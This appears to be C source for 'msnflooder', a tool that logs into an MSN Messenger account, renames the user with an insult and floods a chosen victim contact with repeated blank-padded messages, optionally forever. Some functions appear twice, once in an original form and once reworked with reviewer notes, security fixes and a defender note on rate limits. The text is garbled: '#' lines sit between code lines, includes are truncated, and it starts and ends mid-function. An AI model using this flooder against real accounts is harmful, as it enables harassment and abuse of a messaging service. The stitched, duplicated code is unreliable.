#
#
if ((cut = strchr (set, ' ')) == NULL)
#
_error ("Cannot get server to redirect.");
#
*cut = 0; /* delete end of string */
#
#
if ((cut = strchr (set, ':')) == NULL)
#
_error ("Cannot get server to redirect.");
#
*cut = 0; /* split host and port */
#
#
if (strlen (set) > size)
#
_error ("Server too big !?");
#
#
memcpy (redirect, set, size); /* copy ip of new server */
#
*port = (unsigned short) atoi (++cut); /* save new port */
#
#
fprintf (stdout, "New server received.\n Ip: %s\n Port: %u\n", redirect, *port);
#
#
return 0;
#
}
#
#
/* save id from USR message notification server...
#
MOST IMPORTANT this is required in TWINER authentication !!! */
#
#
int save_id (char* buff, char* id, unsigned short idsize)
#
{
#
char* ptr;
#
#
if ((ptr = strstr (buff, "lc=")) == NULL)
#
_error ("Cannot get id.");
#
if (strlen (ptr) > idsize)
#
_error ("ID too big !?");
#
#
strcpy (id, ptr);
#
#
return 0;
#
#
}
#
#
/* get host and page from NEXUS data in 'data'; page will save in 'page', IP server will save in host ! */
#
#
int nexus_redirect (char* buff, char* host, char* page, unsigned short sizes)
#
{
#
char *ptr, *set;
#
unsigned short size = sizes / 2;
#
#
if ((ptr = strstr (buff, "DALogin=")) == NULL || (set = strchr (ptr, '=')) == NULL)
#
_error ("Cannot get DALogin field.");
#
#
ptr = ++set ; /* delete 'DALogin=' */
#
#
if ((set = strchr (ptr, '/')) == NULL)
#
_error ("Cannot get hostname from NEXUS received data.");
#
#
*set = 0;
#
strncpy (host, ptr, size); /* save host */
#
#
set++;
#
ptr = set;
#
if ((set = strchr (ptr, ',')) == NULL)
#
_error ("Cannot get page from NEXUS received data.");
#
*set = 0;
#
#
strncpy (page, ptr, size);
#
#
fprintf (stdout, "New Host and Page obtained from NEXUS server.\n Server: %s\n Page: %s\n", host, page);
#
#
return 0;
#
}
#
#
/* get ticket from ssl server reply and save it in 'ticket' */
#
#
int save_ticket (char* reply, char* ticket, unsigned short ticket_size)
#
{
#
char* ptr, *t;
#
#
if ((ptr = strstr (reply, "Authentication-Info:")) == NULL || (t = strchr (ptr, '\'')) == NULL)
#
_error ("Cannot get passport ticket.");
#
#
ptr = ++t; /* delete ' char firts 't=' */
#
if ((t = strchr (ptr, '\'')) != NULL) /* cut ticket and replace with 0 */
#
*t = 0;
#
else
#
_error ("Unexpected error !");
#
#
if (strlen (ptr) > ticket_size)
#
_error ("Ticket too long !?");
#
#
snprintf (ticket, ticket_size, "%s\r\n", ptr);
#
#
fprintf (stdout, "OK, ticket received and saved.\n");
#
#
return 0;
#
}
#
#
/* authentication with TWINER */
#
#
int usr_receive (int sd, char* req, char* ticket, char* buff, unsigned short size, char* assertion)
#
{
#
int l, rval;
#
char *request;
#
#
memset (buff, 0, size);
#
#
l = strlen (req) + strlen (ticket) + 2;
#
if ((request = (char*) malloc (l * sizeof (char))) == NULL)
#
_error ("Cannot allocate memory for TWINER authentication send data.");
#
#
sprintf (request, "%s %s", req, ticket);
#
#
rval = send (sd, request, strlen (request), 0);
#
if (rval < 0)
#
_error ("Cannot send data !?");
#
#
if ((rval = recv (sd, buff, size - 1, 0)) < 0)
#
_error ("Cannot receive data !?");
#
#
buff[rval] = 0;
#
#
if (strncmp (buff, assertion, strlen (assertion)) != 0)
#
_error ("Login failed.");
#
#
fprintf (stdout, "Login successfull.\n");
#
#
free (request);
#
request = NULL;
#
clean_sock (sd);
#
return 0;
#
}
#
#
/* syncronize with server and receive contacts list...We will ignore all... */
#
#
int syn_receive (int sd, char* request)
#
{
#
int rval;
#
char buff[2048];
#
fd_set read_set;
#
struct timeval timeout;
#
#
printf ("Syncronizing with server...");
#
fflush (stdout);
#
#
if (send (sd, request, strlen (request), 0) < 0)
#
{
#
printf ("Failed.\n");
#
_exit (-1);
#
}
#
#
FD_ZERO (&read_set);
#
#
while (1)
#
{
#
FD_SET (sd, &read_set);
#
timeout.tv_sec = 3;
#
timeout.tv_usec = 0;
#
rval = select (sd + 1, &read_set, NULL, NULL, &timeout);
#
#
if (rval < 0)
#
_error ("select() call failed.");
#
else if (!rval)
#
break;
#
else
#
recv (sd, buff, 2048, 0);
#
}
#
printf ("OK.\n");
#
return 0;
#
}
#
#
/* prepare to flood */
#
#
int init_msg (int sd, char* req, char* new_server, unsigned short server_size, unsigned short* port,
#
char* id, char* account, char* victim)
#
{
#
int sd_sb, read, type, length, size=2048;
#
char buff[size], *ptr, *set, *server, request[size];
#
#
clean_sock (sd);
#
#
if (send (sd, req, strlen (req), 0) < 0)
#
_error ("Cannot send request to start flood :-(");
#
#
fprintf (stdout, "\nInitialize flood...\n");
#
#
if ((read = recv (sd, buff, sizeof buff - 1, 0)) < 0)
#
_error ("Cannot receive data.");
#
#
buff[read] = 0;
#
#
/* read new server port and id */
#
#
if ((ptr = strstr (buff, "XFR 9 SB ")) == NULL || (set = strchr (ptr, ':')) == NULL)
#
_error ("Cannot read new server.");
#
ptr += strlen ("XFR 9 SB ");
#
*set = 0;
#
strncpy (new_server, ptr, server_size);
#
#
ptr = ++set;
#
if ((set = strchr (ptr, ' ')) == NULL)
#
_error ("Cannot read new port.");
#
*set = 0;
#
*port = atoi (ptr);
#
#
ptr = ++set;
#
if ((set = strstr (ptr, "CKI ")) == NULL)
#
_error ("Cannot get id from XFR SB.");
#
ptr = set + strlen ("CKI ");
#
if ((set = strchr (ptr, '\n')) == NULL)
#
_error ("Cannot get id from XFR SB.");
#
set++;
#
*set = 0; /* set NULL char after "\r\n" */
#
if (strlen (ptr) > size)
#
_error ("Data from XFR SB too long !?");
#
strcpy (id, ptr);
#
#
server = resolve (&type, &length, new_server);
#
sd_sb = msn_connect (server, *port, type, length);
#
#
snprintf (request, size, "USR 8 %s %s", account, id);
#
msn_request (sd_sb, type, server, request, buff, size);
#
if (strncmp (buff, "USR 8 OK", 8) != 0)
#
_error ("Unexpected error. Try again please !");
#
#
fprintf (stdout, "Calling %s...", victim);
#
fflush (stdout);
#
#
snprintf (request, size, "CAL 10 %s\r\n", victim);
#
msn_request (sd_sb, type, server, request, buff, size);
#
if (strncmp (buff, "CAL 10 RINGING", 13) != 0)
#
{
#
if (!strncmp (buff, "217", 3))
#
{
#
snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" don't exist in your contacts list or is offline/hide.\n", victim);
#
_error (buff);
#
}
#
else
#
{
#
snprintf (buff, sizeof buff - 1, "Failed.\nContacts \"%s\" is invalid !?.\n", victim);
#
_error (buff);
#
}
#
}
#
#
puts ("OK.");
#
msn_request (sd_sb, type, server, NULL, buff, size); /* receive only other data... */
#
if (strncmp (buff, "JOI", 3) != 0)
#
_error ("JOI command not received !?");
#
#
return sd_sb; /* return socket descriptor */
#
}
#
#
/*
 * Build one fixed MSG command and send it repeatedly on the already connected
 * session socket 'sd_sb'.
 *
 * sd_sb  connected socket descriptor
 * force  0: the child process sends the message 1500 times and exits;
 *        non-zero: the child sends without a counter until the parent
 *        signals it after Enter is read from stdin
 *
 * Returns 0. Failures go through _error(), which exits the process.
 *
 * NOTE(defender): seen from the service this is a burst of identical MSG
 * commands on a single session whose bodies consist only of CRLF pairs.
 * Per-session message-rate limits and payload checks on the server, and
 * blocking the sender on the receiving side, are the countermeasures.
 */
int send_msg (int sd_sb, unsigned short force)
#
{
#
static const char header[] = "MIME-Version: 1.0\r\n"
#
"Content-Type: text/plain; charset=UTF-8\r\n"
#
"X-MMS-IM-Format: FN=Arial; EF=I; CO=0; CS=0; PF=22\r\n"
#
"\r\n";
#
#
char tmp[1003];
#
char msg[1500];
#
char *set;
#
unsigned cnt, len;
#
pid_t pid;
#
#
memset (msg, 0, sizeof msg);
#
#
fprintf (stdout, "\nFlooding%s...", (!force) ? "" : ", press Enter for stop");
#
fflush (stdout);
#
#
/* Fill tmp with CRLF pairs: len is sizeof tmp - 3, and two bytes are appended
 * per iteration until cnt reaches len. */
cnt = 0;
#
len = sizeof (tmp) - 3;
#
memset (tmp, 0, len);
#
#
while (cnt < len)
#
{
#
strcat (tmp, "\r\n");
#
cnt += 2;
#
}
#
/* cut at the last '\r' and re-append one CRLF so the body ends on a full pair */
set = strrchr (tmp, '\r');
#
if (set) *set = 0;
#
strcat (tmp, "\r\n");
#
/* payload length announced in the MSG line: MIME header plus body */
len = strlen (header) + strlen (tmp);
#
#
sprintf (msg, "MSG 11 N %d\r\n"
#
"%s%s", len, header, tmp);
#
#
cnt = 0;
#
/* the sending loop runs in a child so the parent can keep reading stdin */
pid = fork();
#
#
if (pid < 0)
#
_error ("Unexpected error.");
#
else if (!pid)
#
{
#
/* child: cnt only advances when force is 0, so with force set the loop has
 * no exit condition of its own */
while (cnt < 1500)
#
{
#
if (send (sd_sb, msg, strlen (msg), 0) < 0)
#
_error ("Cannot send message.");
#
if (!force) /* if 'force' parameter is true flood forever... */
#
cnt++;
#
}
#
_exit (0);
#
}
#
else
#
{
#
/* parent: with force set, wait for a newline on stdin and then signal the
 * child; otherwise wait for the child to finish its 1500 sends */
if (force)
#
{
#
int c;
#
while (1)
#
if ((c = getchar()) == '\n')
#
{
#
fprintf (stdout, "Stopping flood...");
#
fflush (stdout);
#
if (kill (pid, SIGINT) < 0)
#
_error ("Cannot kill child.");
#
else
#
break;
#
}
#
}
#
else
#
wait (0);
#
}
#
#
puts ("OK");
#
return 0;
#
}
#
#
int login_redirection ( char* server, char* page, char* buff, unsigned short size,
#
int* type, int* length, char* request)
#
{
#
char *set, *off;
#
#
fprintf (stdout, "Redirected to another server.\n");
#
#
if ((set = strstr (buff, "Location: ")) == NULL)
#
_error ("Cannot get new server.");
#
#
set += strlen ("Location: ");
#
#
if ((off = strchr (set, '/')) == NULL)
#
_error ("Cannot get new server.");
#
#
while (*off == '/') off++;
#
set = off;
#
#
if ((off = strchr (set, '/')) == NULL)
#
_error ("Cannot get new page.");
#
#
*off = 0;
#
off++;
#
#
strncpy (server, set, 512); /* 512 is size of server and page */
#
#
set = off;
#
if ((off = strchr (set, '\r')) != NULL)
#
*off = 0;
#
#
strncpy (page, set, 512); /* 512 is size of server and page */
#
#
fprintf (stdout, " Server: %s\n Page: %s\n", server, page);
#
#
_ssl_request ( type, length, server, 443, request,
#
buff, size, (char*) NULL, "Unauthorized.");
#
#
if (strncmp (buff, "HTTP/1.1 200 OK", 15))
#
{
#
puts ("\nPlease report this Error:\n");
#
_error (buff);
#
}
#
#
return 0;
#
}
#
#
int main (int argc, char** argv){
#
#
int sd, sd_sb, type, length;
#
unsigned short buff_size = 4096, port = 0, force_flood = 0;
#
char c, *server=NULL,
#
account[200], pass[200], *e_pass=NULL, *victim=NULL,
#
buff[buff_size], id[buff_size], id_sb[buff_size], nexus_redir[2][512], request[buff_size], ticket[buff_size],
#
xfr_server[50], xfr_sb_server[50], *rnick;
#
#
if (argc < 3 || argc > 6) usage (*argv);
#
#
while ((c = getopt (argc, argv, "a:r:fh")) != -1)
#
{
#
switch (c)
#
{
#
case 'a': victim = strdup (optarg);
#
if (victim == NULL) _error ("Cannot allocate memory.");
#
break;
#
case 'f': force_flood = 1;
#
break;
#
case 'h': usage (*argv);
#
break;
#
case 'r': rnick = strdup (optarg);
#
if (rnick == NULL) _error ("Cannot allocate memory.");
#
break;
#
case '?':
#
if (optopt == 'a' || optopt == 'r')
#
{
#
fprintf (stderr, "\nOption -%c requires an argument.\n"
#
"See %s -h\n\n", optopt, *argv);
#
exit (2);
#
}
#
else
#
{
#
fprintf (stderr, "\nUnknow -%c option.\n"
#
"See %s -h\n\n", optopt, *argv);
#
exit (2);
#
}
#
}
#
}
#
#
if (!victim) usage (*argv);
#
#
get_data (account, pass, 200);
#
putchar ('\n');
#
server = resolve (&type, &length, "messenger.hotmail.com");
#
sd = msn_connect (server, 1863, type, length);
#
msn_start (sd, type, server, account, buff, buff_size);
#
close (sd); /* close connection */
#
fprintf (stdout, "Connection close.\n");
#
xfr_redirect (buff, xfr_server, sizeof (xfr_server) - 1, &port); /* get new server and port */
#
server = resolve (&type, &length, xfr_server);
#
sd = msn_connect (server, 1863, type, length); /* connecting to new server */
#
msn_start (sd, type, server, account, buff, buff_size);
#
#
save_id (buff, id, buff_size); /* save id required by nexus authentication */
#
e_pass = str_encode (pass);
#
#
fprintf (stdout, "Incoming TWEENER Authentication.\n");
#
#
_ssl_request (&type, &length, "nexus.passport.com", 443,
#
"GET /rdr/pprdr.asp HTTP/1.0\r\n\r\n",
#
buff, buff_size,
#
"HTTP/1.1 200 OK", "Bad NEXUS reply.");
#
#
nexus_redirect (buff, nexus_redir[0], nexus_redir[1], sizeof (nexus_redir) - 1);
#
#
snprintf (request, buff_size,
#
"GET /%s HTTP/1.1\r\n"
#
"Authorization: Passport1.4 OrgVerb=GET,"
#
"OrgURL=http%%3A%%2F%%2Fmessenger%%2Emsn%%2Ecom,"
#
"sign-in=%s,pwd=%s,%s"
#
"User-Agent: MSMSGS\r\n"
#
"Host: %s\r\n"
#
"Connection: Keep-Alive\r\n"
#
"Cache-Control: no-cache\r\n\r\n",
#
nexus_redir[1], account, e_pass, id, nexus_redir[0]);
#
#
_ssl_request ( &type, &length, nexus_redir[0], 443, request,
#
buff, buff_size, (char*) NULL, "Unauthorized.");
#
#
if (!strncmp (buff, "HTTP/1.1 200 OK", 15))
#
;
#
else if (!strncmp (buff, "HTTP/1.1 302 Found", 18)) /* redirection... */
#
login_redirection ( nexus_redir[0], nexus_redir[1], buff, buff_size,
#
&type, &length, request);
#
else
#
_error ("\nUnauthorized.\n");
#
#
save_ticket (buff, ticket, sizeof ticket - 1);
#
usr_receive (sd, "USR 4 TWN S", ticket, buff, buff_size, "USR 4 OK");
#
syn_receive (sd, "SYN 5 0 0\r\n");
#
msn_request (sd, type, server, "PRP 6 MFN SPAMMER\r\n", buff, buff_size); /* set new nick name */
#
msn_request (sd, type, server, "CHG 7 NLN 0 0\r\n", buff, buff_size); /* set online status */
#
msn_request (sd, type, server, "PRP 8 MFN MSN%20SHIT%20SHIT%20SHIT%20!!!\r\n", buff, buff_size); /* set new nick name */
#
sd_sb = init_msg (sd, "XFR 9 SB\r\n", xfr_sb_server, sizeof (xfr_sb_server) - 1, &port, id_sb, account, victim);
#
send_msg (sd_sb, force_flood);
#
close (sd_sb);
#
#
snprintf (request, buff_size, "PRP 12 MFN %s\r\n", (rnick == NULL) ? account : rnick);
#
msn_request (sd, type, server, request, buff, buff_size); /* restore nick name */
#
msn_request (sd, type, server, "OUT\r\n", buff, buff_size); /* quit */
#
close (sd);
#
#
fprintf (stdout, "\n\n Finish ! :-))\n\n");
#
#
return 0;
#
}
/***************************************************************************
#
* Copyright (C) 2007 by Dani (Rebootz, Jeet99 ecc... :-P) *
#
* cradle.dani|at|gmail.com *
#
* *
#
* This program is free software; you can redistribute it and/or modify *
#
* it under the terms of the GNU General Public License as published by *
#
* the Free Software Foundation; either version 2 of the License, or *
#
* any later version. *
#
* *
#
* This program is distributed in the hope that it will be useful, *
#
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#
* GNU General Public License for more details. *
#
* *
#
* Compiling: $ gcc -Wall msnflooder.c -o msnflooder -lssl *
#
* Usage: $ ./msnflooder -f -a victim@hotmail.com -r nickname *
#
* *
#
* [Victim must be in your contact list AND connected !] *
#
* *
#
***************************************************************************/
#
#
#include
#
#include
#
#include
#
#include
#
#define SIGINT 2
#
#
int isalnum (int c);
#
int close(int fd);
#
void _exit(int status);
#
char *getpass (const char* prompt);
#
#
int kill(pid_t pid, int sig);
#
pid_t wait (int* status);
#
#
#
BIO *bio_err = 0;
#
#
/* usage */
#
#
void usage (char* prgname)
#
{
#
fprintf (stdout, "\n"
#
"Usage: %s -a
#
"Victim must be in your contacts list and connected !\n\n"
#
"-a option set victim\n"
#
"-f option flood forever\n"
#
"-r option restore a nick name\n\n",
#
prgname);
#
_exit (2);
#
}
#
#
/* print an error to stderr and quit */
#
#
void _error (char* msg)
#
{
#
fprintf (stderr, "%s\n", msg);
#
_exit (-1);
#
}
#
#
/* receive other data */
#
#
void clean_sock (int sd)
#
{
#
char buff[1024];
#
int rval;
#
fd_set read_set;
#
struct timeval timeout;
#
#
FD_ZERO (&read_set);
#
#
while (1)
#
{
#
FD_SET (sd, &read_set);
#
timeout.tv_sec = 3;
#
timeout.tv_usec = 0;
#
rval = select (sd+1, &read_set, NULL, NULL, &timeout);
#
#
if (rval < 0)
#
_error ("select call failed.");
#
else if (!rval)
#
break;
#
else
#
recv (sd, buff, sizeof buff - 1, 0);
#
}
#
return ;
#
}
#
#
/* verify a valid email address */
#
#
int verify_mail (char* account)
#
{
#
char* ptr;
#
unsigned short int l;
#
#
l = strlen (account);
#
#
if (l > 200)
#
_error ("WHAT ?!");
#
#
if ((ptr = strchr (account, '@')) == NULL || strchr (ptr, '.') == NULL)
#
return 1;
#
#
return 0;
#
}
#
#
/* read your account and password */
#
#
int get_data (char* account, char* pass, unsigned short size)
#
{
#
int set;
#
char* tmp;
#
#
fprintf (stdout, "Your account: ");
#
fflush (stdout);
#
fgets (account, size, stdin);
#
set = strlen (account) - 1;
#
* (account + set) = 0;
#
#
if (verify_mail (account))
#
{
#
fprintf (stderr, "\"%s\" isn't a valid email address.\n", account);
#
_exit (-1);
#
}
#
#
fprintf (stdout, "Your password: ");
#
fflush (stdout);
#
tmp = getpass ("");
#
if (strlen (tmp) > size - 1)
#
_error ("Password too long !?");
#
strcpy (pass, tmp);
#
#
return 0;
#
}
#
#
/* "encode" password; change only alphanumeric char in hex :D */
#
#
char* str_encode (char* str)
#
{
#
char* ret;
#
unsigned short len = strlen (str),
#
size = (len * 2 * sizeof (char)) + 1,
#
x, y;
#
#
if ((ret = (char*) malloc (size)) == NULL)
#
_error ("Cannot allocate memory.");
#
#
memset (ret, 0, size);
#
#
for (x=0, y=0; x
if (!isalnum (str[x]))
#
{
#
sprintf(&ret[y], "%%%x", str[x]);
#
y += 2;
#
} else
#
ret[y] = str[x];
#
#
return ret;
#
}
#
#
/* resolve a hostname, save type and length of address in
#
* 'type' and 'length' and return ip */
#
#
/*
 * Look up `host` with gethostbyname().
 *
 * type    out: address family of the result (h_addrtype)
 * length  out: size in bytes of one address (h_length)
 * host    name to resolve
 *
 * Returns a pointer to the first raw address of the result. The pointer
 * refers to storage owned by the resolver, which gethostbyname() may
 * overwrite on a later call, so callers that need the address after
 * another lookup have to copy it.
 * A failed lookup is reported through _error().
 */
char* resolve (int* type, int* length, char* host)
{
    struct hostent* entry = gethostbyname (host);

    if (entry == NULL)
    {
        char message[1024];

        snprintf (message, sizeof message -1, "Cannot resolve %s.", host);
        _error (message);
    }

    *type = entry->h_addrtype;
    *length = entry->h_length;

    return (char*) entry->h_addr_list[0];
}
#
#
/* initialize ssl */
#
#
/*
 * Create a client-side SSL context.
 *
 * The first call (detected through the global `bio_err` being unset)
 * also initialises the SSL library, loads its error strings and points
 * `bio_err` at stderr.
 *
 * Returns the result of SSL_CTX_new(), which the caller has to check and
 * eventually release with SSL_CTX_free().
 *
 * NOTE(review): TLSv1_client_method() pins the protocol to TLS 1.0, and
 * this function neither loads trust anchors nor sets a verify mode, so
 * unless that happens elsewhere the server certificate is never checked
 * and the credentials sent over this context are open to interception.
 */
SSL_CTX * initialize_ctx (void)
{
    if (bio_err == NULL)
    {
        SSL_library_init ();
        SSL_load_error_strings ();
        bio_err = BIO_new_fp (stderr, BIO_NOCLOSE);
    }

    return SSL_CTX_new (TLSv1_client_method ());
}
#
#
/* connect to IP, request data and save result to 'buff' */
#
#
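/*
 * Open a TCP connection to `server`, run an SSL handshake on it, send
 * `request` and store the first chunk of the reply in `buff`.
 *
 * Returns `buff`, always NUL-terminated. Every failure is reported
 * through _error().
 *
 * Changes from the original:
 *   - `request` is copied with an explicit "%s" format. The original
 *     passed it to snprintf() as the format string, so any '%' in the
 *     request (URL escapes, text taken from a server reply, the user's
 *     password) was interpreted as a conversion specification;
 *   - only IPv4 addresses of the expected size are accepted, so the
 *     memcpy() into sin_addr can no longer write past the field;
 *   - the reply is read into size - 1 bytes so the zeroed last byte keeps
 *     the buffer terminated for the strncmp()/strstr() calls made on it;
 *   - the context, SSL object and BIO are checked before use.
 *
 * NOTE(review): the peer certificate and host name are not verified
 * anywhere in this function.
 */
char* _ssl_connect ( char *request,       /* request page */
                     int type,            /* type of address */
                     int length,          /* server length */
                     char* server,        /* IP server */
                     unsigned short port, /* port to connect */
                     char *buff,          /* saved received data */
                     unsigned short size) /* max size received data */
{
    SSL_CTX* ctx;
    SSL* ssl;
    BIO* sbio;
    struct sockaddr_in server_in;
    int sock;

    if (size < 2)
        _error ("Receive buffer too small.");

    if (type != AF_INET || length != (int) sizeof server_in.sin_addr.s_addr)
        _error ("Unsupported address family.");

    if ((ctx = initialize_ctx ()) == NULL)
        _error ("Cannot create SSL context.");

    memset (&server_in, 0, sizeof server_in);
    server_in.sin_family = AF_INET;
    server_in.sin_port = htons (port);
    memcpy (&server_in.sin_addr.s_addr, server, sizeof server_in.sin_addr.s_addr);

    if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
        _error ("Cannot create socket.");

    if ((connect (sock, (struct sockaddr*) &server_in, sizeof server_in)) < 0)
        _error ("Cannot connect to host.");

    if ((ssl = SSL_new (ctx)) == NULL)
        _error ("Cannot create SSL object.");

    if ((sbio = BIO_new_socket (sock, BIO_NOCLOSE)) == NULL)
        _error ("Cannot create socket BIO.");

    SSL_set_bio (ssl, sbio, sbio);

    /* the request is data, never a format string */
    snprintf (buff, size, "%s", request);

    if (SSL_connect (ssl) <= 0)
        _error ("Cannot connect to SSL server.");

    if (SSL_write (ssl, buff, strlen (buff)) < 1)
        _error ("Cannot send SSL data.");

    memset (buff, 0, size);

    if (SSL_read (ssl, buff, size - 1) <= 0)
        _error ("Cannot receive SSL data.");

    if (SSL_shutdown (ssl) < 0)
        _error ("Cannot shutdown SSL connection.");

    SSL_free (ssl);
    SSL_CTX_free (ctx);
    close (sock);

    return buff;
}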
#
#
/* resolve a name and send ssl request to it. If received data NOT start with
#
'assertion', print error_message to stderr and quit ! */
#
#
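/*
 * Resolve `host`, send `request` to it over SSL and check the reply.
 *
 * type, length  out: filled in by resolve() for the resolved address
 * host          host name to contact
 * port          TCP port
 * request       text to send
 * buff, size    receive buffer and its capacity
 * assertion     expected prefix of the reply, or NULL to skip the check
 * error_message text passed to _error() when the prefix does not match
 *
 * Returns 0.
 *
 * Change from the original: the progress line is printed after the name
 * has been resolved and shows the resolved address. The original ran
 * inet_ntop() over the bytes of the host NAME, using whatever *type held
 * on entry, so it printed a meaningless address.
 */
int _ssl_request (int* type, int* length, char* host, int port, char* request, char* buff, unsigned short size,
                  char* assertion, char* error_message)
{
    char* server;
    char shown[1024];

    server = resolve (type, length, host); /* type and length are modified here */

    if (inet_ntop (*type, server, shown, sizeof shown - 1) != NULL)
    {
        fprintf (stdout, "Connecting to %s and send request...", shown);
        fflush (stdout);
    }

    _ssl_connect (request, *type, *length, server, port, buff, size);

    if (assertion != (char*) NULL && strncmp (buff, assertion, strlen (assertion)) != 0)
        _error (error_message);

    fprintf (stdout, "OK\n");

    return 0;
}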
#
#
/* connect to msn server and return a socket descriptor; socket NO close ;) */
#
#
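/*
 * Open a TCP connection to the raw address `server` and return the
 * connected socket descriptor. The caller closes it.
 *
 * server  raw address bytes, as returned by resolve()
 * port    TCP port, host byte order
 * family  address family of `server`
 * length  size in bytes of `server`
 *
 * Failures are reported through _error().
 *
 * Changes from the original:
 *   - only IPv4 addresses of the expected size are accepted, so the
 *     memcpy() into sin_addr stays inside the field;
 *   - the sockaddr is zeroed before it is filled in;
 *   - whether inet_ntop() produced a printable address is remembered.
 *     The original tested `*buffer == NULL`, which is never true for an
 *     array, so a failed inet_ntop() led to an uninitialised buffer
 *     being formatted into the error message.
 */
int msn_connect (char* server, unsigned short port, int family, int length)
{
    struct sockaddr_in sock;
    int sd;
    int have_text;
    char buffer[2][1024];

    if (family != AF_INET || length != (int) sizeof sock.sin_addr.s_addr)
        _error ("Unsupported address family.");

    have_text = inet_ntop (family, server, buffer[0], sizeof buffer[0] - 1) != NULL;

    if (have_text)
        fprintf (stdout, "Connecting to %s at port %u...", buffer[0], port);

    fflush (stdout);

    memset (&sock, 0, sizeof sock);
    sock.sin_family = family;
    sock.sin_port = htons (port);
    memcpy (&sock.sin_addr.s_addr, server, sizeof sock.sin_addr.s_addr);

    if ((sd = socket (family, SOCK_STREAM, 0)) < 0)
        _error ("Cannot create socket.");

    if (connect (sd, (struct sockaddr*) &sock, sizeof sock) < 0)
    {
        if (!have_text)
            _error ("Cannot connect to server.");
        else
        {
            snprintf (buffer[1], sizeof buffer[1] - 1, "Cannot connect to %s.", buffer[0]);
            _error (buffer[1]);
        }
    }

    printf ("OK.\n");

    return sd;
}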
#
#
/* send data to a server, save result in 'buff' without "\r\n"; socket (sd) is ALREADY connected;
if request is null JUST receive data */
#
#
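/*
 * Optionally send `request` on the connected socket `sd`, then read one
 * chunk of the reply into `buff`.
 *
 * sd       connected socket
 * family   address family of `server`, used only for error messages
 * server   raw address bytes, used only for error messages
 * request  text to send, or NULL to receive only
 * buff     receive buffer; on return it is NUL-terminated and cut at the
 *          last '\r' it contains
 * size     capacity of `buff` in bytes
 *
 * Returns 0. Send and receive failures are reported through _error().
 *
 * Changes from the original:
 *   - at most size - 1 bytes are received. The original received `size`
 *     bytes and then wrote the terminator at buff[size], one byte past
 *     the end of the buffer, whenever the peer filled it completely;
 *   - a failed inet_ntop() no longer leaves the address text
 *     uninitialised when an error message is built.
 */
int msn_request (int sd, int family, char* server,
                 char* request, char* buff, unsigned short size)
{
    char *set, buffer[2][512];
    int got = 0;

    if (size == 0)
        _error ("Receive buffer too small.");

    memset (buff, 0, size);

    if (request != (char*) NULL && send (sd, request, strlen (request), 0) < 0)
    {
        if (inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1) == NULL)
            snprintf (buffer[1], sizeof buffer[1], "server");
        snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot send request to %s.", buffer[1]);
        _error (buffer[0]);
    }

    if ((got = recv (sd, buff, size - 1, 0)) < 0)
    {
        if (inet_ntop (family, server, buffer[1], sizeof buffer[1] - 1) == NULL)
            snprintf (buffer[1], sizeof buffer[1], "server");
        snprintf (buffer[0], sizeof buffer[0] - 1, "Cannot receive data from %s.", buffer[1]);
        _error (buffer[0]);
    }

    buff[got] = 0;                      /* got <= size - 1, so this is in bounds */

    if ((set = strrchr (buff, '\r')) != NULL)
        *set = 0;

    return 0;
}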
#
#
/* call msn_request() and initialize login */
#
#
/*
 * Send the three opening commands of the login exchange (VER, CVR, USR)
 * on `sd`, one msn_request() round trip each.
 *
 * On return `buff` holds the reply to the last command (USR). Returns 0.
 *
 * NOTE(review): `account` is placed into the command lines as typed; the
 * replies to VER and CVR are overwritten without being inspected.
 */
int msn_start (int sd, int type, char* server, char* account, char* buff, unsigned short buff_size)
{
    char line[buff_size];

    /* step 1: protocol version */
    snprintf (line, buff_size, "VER 1 MSNP11 CVR0\r\n");
    msn_request (sd, type, server, line, buff, buff_size);

    /* step 2: client description */
    snprintf (line, buff_size, "CVR 2 0x0409 win 4.10 i386 MSNMSGR 5.0.0544 MSMSGS %s\r\n", account);
    msn_request (sd, type, server, line, buff, buff_size);

    /* step 3: start of authentication for this account */
    snprintf (line, buff_size, "USR 3 TWN I %s\r\n", account);
    msn_request (sd, type, server, line, buff, buff_size);

    return 0;
}
#
#
/* get from received data (data) new server ip and port. Save it in 'redirect' and 'port' */
#
#
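/*
 * Parse an "XFR ... NS <host>:<port> ..." reply and extract the host and
 * the port of the server the client is being sent to.
 *
 * data      reply text; it is modified in place (separators become NULs)
 * redirect  out: host part, NUL-terminated
 * size      room available in `redirect`; the host, including its
 *           terminator, must fit in `size` bytes
 * port      out: port number
 *
 * Returns 0. Any malformed reply is reported through _error().
 *
 * Changes from the original:
 *   - the host is copied by its own length plus terminator. The original
 *     always copied `size` bytes, reading past the end of the host text,
 *     and left `redirect` unterminated when the host was exactly `size`
 *     bytes long;
 *   - the port is parsed with strtol() and must be a number in 1..65535;
 *     atoi() silently turned junk into 0 and wrapped large values.
 */
int xfr_redirect (char* data, char* redirect, unsigned short size, unsigned short* port)
{
    char *set, *cut, *end;
    size_t host_len;
    long value;

    if (strncmp (data, "XFR", 3) != 0 || (set = strstr (data, "NS ")) == NULL)
        _error ("Cannot get server to redirect.");

    set += 3;                           /* skip 'NS ' */

    if ((cut = strchr (set, ' ')) == NULL)
        _error ("Cannot get server to redirect.");

    *cut = 0;                           /* drop everything after host:port */

    if ((cut = strchr (set, ':')) == NULL)
        _error ("Cannot get server to redirect.");

    *cut = 0;                           /* split host and port */

    host_len = strlen (set);
    if (host_len >= size)
        _error ("Server too big !?");

    memcpy (redirect, set, host_len + 1);   /* host and its terminator */

    value = strtol (cut + 1, &end, 10);
    if (end == cut + 1 || *end != '\0' || value < 1 || value > 65535)
        _error ("Cannot get server to redirect.");

    *port = (unsigned short) value;

    fprintf (stdout, "New server received.\n Ip: %s\n Port: %u\n", redirect, *port);

    return 0;
}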
#
#
/* save id from USR message notification server...
#
MOST IMPORTANT this is required in TWINER authentication !!! */
#
#
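/*
 * Copy the part of `buff` that starts at "lc=" into `id`.
 *
 * buff    reply text to search
 * id      out: copy of the text from "lc=" to the end of `buff`
 * idsize  capacity of `id` in bytes
 *
 * Returns 0. A missing "lc=" or a value that does not fit is reported
 * through _error().
 *
 * Change from the original: the value is rejected when its length equals
 * `idsize`. The original accepted that case and strcpy() then wrote the
 * terminator one byte past the end of `id`.
 */
int save_id (char* buff, char* id, unsigned short idsize)
{
    char* ptr;

    if ((ptr = strstr (buff, "lc=")) == NULL)
        _error ("Cannot get id.");

    if (strlen (ptr) >= idsize)
        _error ("ID too big !?");

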